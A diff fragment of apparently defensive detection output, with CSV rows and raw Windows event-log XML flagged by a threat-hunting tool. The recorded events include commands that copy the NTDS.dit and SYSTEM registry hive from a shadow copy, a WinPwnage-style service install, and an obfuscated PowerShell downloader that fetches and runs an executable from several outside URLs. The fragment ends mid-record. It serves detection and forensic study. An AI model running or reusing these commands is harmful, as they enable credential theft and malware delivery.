+    <Data Name=""LogonId"">0x509ff</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
+    <Data Name=""ParentProcessId"">804</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:27.233257Z"">
+    </TimeCreated>
+    <EventRecordID>4133</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:27.220</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-001041504B00</Data>
+    <Data Name=""ProcessId"">6508</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:27.202862Z"">
+    </TimeCreated>
+    <EventRecordID>4132</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:27.192</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00102D4D4B00</Data>
+    <Data Name=""ProcessId"">976</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:27.169217Z"">
+    </TimeCreated>
+    <EventRecordID>4131</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:27.156</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00101A4A4B00</Data>
+    <Data Name=""ProcessId"">5772</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:27.082080Z"">
+    </TimeCreated>
+    <EventRecordID>4130</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:27.069</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00107B454B00</Data>
+    <Data Name=""ProcessId"">3344</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
+    </Provider>
+    <EventID Qualifiers=""16384"">7045</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8080000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
+    </TimeCreated>
+    <EventRecordID>10446</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""468"" ThreadID=""3256"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""ServiceName"">WinPwnage</Data>
+    <Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
+    <Data Name=""ServiceType"">user mode service</Data>
+    <Data Name=""StartType"">demand start</Data>
+    <Data Name=""AccountName"">LocalSystem</Data>
+  </EventData>
+</Event>",IEWIN7,System
+cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
+    </Provider>
+    <EventID Qualifiers=""16384"">7045</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8080000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
+    </TimeCreated>
+    <EventRecordID>10446</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""468"" ThreadID=""3256"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""ServiceName"">WinPwnage</Data>
+    <Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
+    <Data Name=""ServiceType"">user mode service</Data>
+    <Data Name=""StartType"">demand start</Data>
+    <Data Name=""AccountName"">LocalSystem</Data>
+  </EventData>
+</Event>",IEWIN7,System
+Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
+    </Provider>
+    <EventID Qualifiers=""16384"">7045</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8080000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:41:29.008933Z"">
+    </TimeCreated>
+    <EventRecordID>6045</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2308"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-500"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""ServiceName"">remotesvc</Data>
+    <Data Name=""ImagePath"">calc.exe</Data>
+    <Data Name=""ServiceType"">user mode service</Data>
+    <Data Name=""StartType"">auto start</Data>
+    <Data Name=""AccountName"">LocalSystem</Data>
+  </EventData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,System
+System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>104</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:34:25.894341Z"">
+    </TimeCreated>
+    <EventRecordID>27736</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""812"" ThreadID=""3916"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1106"">
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserName>user01</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <Channel>System</Channel>
+      <BackupPath></BackupPath>
+    </LogFileCleared>
+  </UserData>
+</Event>",PC01.example.corp,System
+Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
+    </Provider>
+    <EventID Qualifiers=""16384"">7045</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8080000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-03T09:24:24.699653Z"">
+    </TimeCreated>
+    <EventRecordID>4482</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2024"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""ServiceName"">spoolsv</Data>
+    <Data Name=""ImagePath"">cmd.exe</Data>
+    <Data Name=""ServiceType"">user mode service</Data>
+    <Data Name=""StartType"">auto start</Data>
+    <Data Name=""AccountName"">LocalSystem</Data>
+  </EventData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,System
+Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
+    </Provider>
+    <EventID Qualifiers=""16384"">7045</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8080000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-03T09:20:28.621489Z"">
+    </TimeCreated>
+    <EventRecordID>4480</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""140"">
+    </Execution>
+    <Channel>System</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""ServiceName"">spoolfool</Data>
+    <Data Name=""ImagePath"">cmd.exe</Data>
+    <Data Name=""ServiceType"">user mode service</Data>
+    <Data Name=""StartType"">auto start</Data>
+    <Data Name=""AccountName"">LocalSystem</Data>
+  </EventData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,System
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""PowerShell"">
+    </Provider>
+    <EventID Qualifiers=""0"">800</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x80000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-26T05:09:33.349710Z"">
+    </TimeCreated>
+    <EventRecordID>789</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""0"" ThreadID=""0"">
+    </Execution>
+    <Channel>Windows PowerShell</Channel>
+    <Computer>DESKTOP-RIPCLIP</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
